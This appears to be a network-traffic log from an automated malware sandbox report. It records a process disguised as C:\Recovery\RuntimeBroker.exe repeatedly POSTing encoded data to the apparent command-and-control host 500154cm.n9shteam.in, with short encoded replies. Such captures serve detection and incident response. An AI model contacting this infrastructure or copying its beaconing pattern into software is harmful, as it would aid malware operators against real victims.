                                                                                                            Nov 12, 2024 00:43:51.088709116 CET2512OUTData Raw: 51 54 5b 55 53 5f 5c 5e 5c 58 5a 51 50 5b 58 5c 5b 50 5e 5d 55 55 5a 58 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT[US_\^\XZQP[X\[P^]UUZX__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-32=V5<'5+(#9"5T05>C& <%&[!"^.-
                                                                                                            Nov 12, 2024 00:43:51.313759089 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:51.389118910 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:51 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            119192.168.2.45012637.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:51.739566088 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:52.088771105 CET2512OUTData Raw: 51 53 5e 56 56 51 59 5c 5c 58 5a 51 50 5f 58 53 5b 57 5e 5c 55 54 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS^VVQY\\XZQP_XS[W^\UTZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$.!>]2"!'C8^6V*3.^5)U0>>=&"X49<%&[!"^.=
                                                                                                            Nov 12, 2024 00:43:52.325294018 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:52.404751062 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:52 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            120192.168.2.45012737.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:52.557544947 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:52.916996956 CET2512OUTData Raw: 54 55 5b 57 56 5e 59 5f 5c 58 5a 51 50 53 58 56 5b 52 5e 5c 55 59 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TU[WV^Y_\XZQPSXV[R^\UYZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'- >R5.D$%+!<)&!9Q%=-\*61#3=Z+%&[!"^.
                                                                                                            Nov 12, 2024 00:43:53.143841982 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:53.220634937 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:53 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            121192.168.2.45012837.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:53.341979980 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            122192.168.2.45012937.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:53.621718884 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1820
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:53.982417107 CET1820OUTData Raw: 51 56 5b 51 56 5e 59 53 5c 58 5a 51 50 58 58 53 5b 52 5e 58 55 58 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QV[QV^YS\XZQPXXS[R^XUXZ\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'.01*(:!,>3C4X!;<U=#!!T%.")&2[7&(%&[!"^.!
                                                                                                            Nov 12, 2024 00:43:54.205719948 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:54.281959057 CET308INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:54 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 21 54 2a 3d 27 5a 21 02 2b 09 2e 3d 26 56 31 09 23 02 28 28 30 5c 22 00 1a 11 2f 0d 0b 1d 20 2d 2c 5d 30 29 35 5f 34 06 26 08 28 28 21 5b 05 12 22 03 34 02 3c 12 2b 3c 20 12 3a 31 23 5e 35 30 2b 14 2d 5f 30 0d 2a 2a 25 10 24 2c 3a 1e 24 31 3c 5b 2d 00 22 17 2b 06 2b 57 21 1e 2e 55 0b 11 20 08 33 16 3c 0d 20 01 2c 01 31 3e 2c 55 21 2e 22 53 26 03 20 1d 26 04 28 05 31 08 31 03 32 31 22 5e 25 2a 08 06 3d 5f 2f 5b 25 2a 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: !T*='Z!+.=&V1#((0\"/ -,]0)5_4&((!["4<+< :1#^50+-_0**%$,:$1<[-"++W!.U 3< ,1>,U!."S& &(1121"^%*=_/[%*#Q-/V=[W


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            123192.168.2.45013037.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:53.705888033 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:54.058872938 CET2512OUTData Raw: 51 53 5e 53 56 51 5c 59 5c 58 5a 51 50 5d 58 51 5b 52 5e 50 55 59 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS^SVQ\Y\XZQP]XQ[R^PUYZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\':>"9305(*%5^>$=6*C&\4*)%&[!"^.
                                                                                                            Nov 12, 2024 00:43:54.289213896 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:54.365844965 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:54 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            124192.168.2.45013137.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:54.498725891 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:43:54.854325056 CET2512OUTData Raw: 54 5f 5e 54 56 50 59 53 5c 58 5a 51 50 5d 58 53 5b 55 5e 5e 55 5b 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T_^TVPYS\XZQP]XS[U^^U[Z___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\']- )9W!<6B%56^;*)"Q$->=%.40^(&[!"^.
                                                                                                            Nov 12, 2024 00:43:55.066576004 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:55.143735886 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:54 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            125192.168.2.45013237.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:55.290868044 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:55.636113882 CET2512OUTData Raw: 51 53 5b 5f 56 5b 59 5c 5c 58 5a 51 50 5c 58 5d 5b 57 5e 5a 55 5e 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS[_V[Y\\XZQP\X][W^ZU^Z\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-0Z=;T6<)'5 X6;;*#5!5P3>6=%4#!](&[!"^.1
                                                                                                            Nov 12, 2024 00:43:55.881203890 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:55.954498053 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:55 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            126192.168.2.45013337.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:56.075836897 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:56.433320045 CET2512OUTData Raw: 51 52 5e 52 56 58 59 5e 5c 58 5a 51 50 5e 58 50 5b 53 5e 5a 55 5d 5a 55 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QR^RVXY^\XZQP^XP[S^ZU]ZU__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-6]=U!Z='%([!W>3-!(6'.)C"[ 0<%&[!"^.9
                                                                                                            Nov 12, 2024 00:43:56.807518005 CET1236OUTData Raw: 51 52 5e 52 56 58 59 5e 5c 58 5a 51 50 5e 58 50 5b 53 5e 5a 55 5d 5a 55 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QR^RVXY^\XZQP^XP[S^ZU]ZU__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-6]=U!Z='%([!W>3-!(6'.)C"[ 0<%&[!"^.9
                                                                                                            Nov 12, 2024 00:43:57.313374996 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:57.314399958 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:57.315325975 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:57.317109108 CET1276OUTData Raw: 3a 5d 26 16 33 00 22 2a 02 26 22 10 3a 09 14 05 2b 56 5a 5f 3f 5b 04 21 25 01 00 18 3d 2c 10 28 34 03 16 2a 33 06 3d 21 00 2e 06 1a 03 55 04 34 28 3c 20 3c 39 05 58 12 02 5b 1b 3c 27 31 58 08 30 16 2f 5f 35 58 44 1a 00 32 51 15 3e 32 09 24 38 39
                                                                                                            Data Ascii: :]&3"*&":+VZ_?[!%=,(4*3=!.U4(< <9X[<'1X0/_5XD2Q>2$892.><Q=!12881^7/:?1\<W'9>,/%/<+-51Y."V4[+9+9=8)?X!>5(:(+P<_<;%0^2U<>('9#][#7%=:-*81>=5<<10Y]9,";9_3&_'.R+!=
                                                                                                            Nov 12, 2024 00:43:57.558734894 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:57 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            127192.168.2.45013437.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:57.706549883 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2504
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:58.057652950 CET2504OUTData Raw: 54 51 5b 53 53 58 59 5f 5c 58 5a 51 50 5a 58 55 5b 51 5e 5f 55 55 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TQ[SSXY_\XZQPZXU[Q^_UUZ\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'X..=*6"D'5'!)#&[!=P0=\)" 3!])5&[!"^.-
                                                                                                            Nov 12, 2024 00:43:58.291938066 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:58.377825022 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:58 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            128192.168.2.45013537.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:58.496963978 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:58.854425907 CET2512OUTData Raw: 54 50 5b 53 56 51 59 5f 5c 58 5a 51 50 5d 58 56 5b 54 5e 5f 55 5d 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TP[SVQY_\XZQP]XV[T^_U]Z^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$- )?+="Z)'&$"8(U=#;*'>->! #9)5&[!"^.
                                                                                                            Nov 12, 2024 00:43:59.082463026 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:59.166461945 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:58 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            129192.168.2.45013637.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:59.360807896 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1820
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            130192.168.2.45013737.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:59.698406935 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:44:00.057513952 CET2512OUTData Raw: 51 52 5b 50 56 50 5c 5f 5c 58 5a 51 50 5b 58 57 5b 5c 5e 5a 55 5f 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QR[PVP\_\XZQP[XW[\^ZU_Z^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\':V*=;!#?9$&'">0=!0>*C:#&?&[!"^.-
                                                                                                            Nov 12, 2024 00:44:00.263124943 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:44:00.341254950 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:00 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            131192.168.2.45013837.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:44:00.469882965 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:44:00.823219061 CET2512OUTData Raw: 51 53 5b 5f 56 5c 59 59 5c 58 5a 51 50 5b 58 54 5b 51 5e 5d 55 5e 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS[_V\YY\XZQP[XT[Q^]U^Z]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^.06Z);V#,%$6;!8$U=.Z!>36>= (&[!"^.-
                                                                                                            Nov 12, 2024 00:44:01.035492897 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:44:01.109524012 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:00 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            132192.168.2.45013937.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:44:01.232819080 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
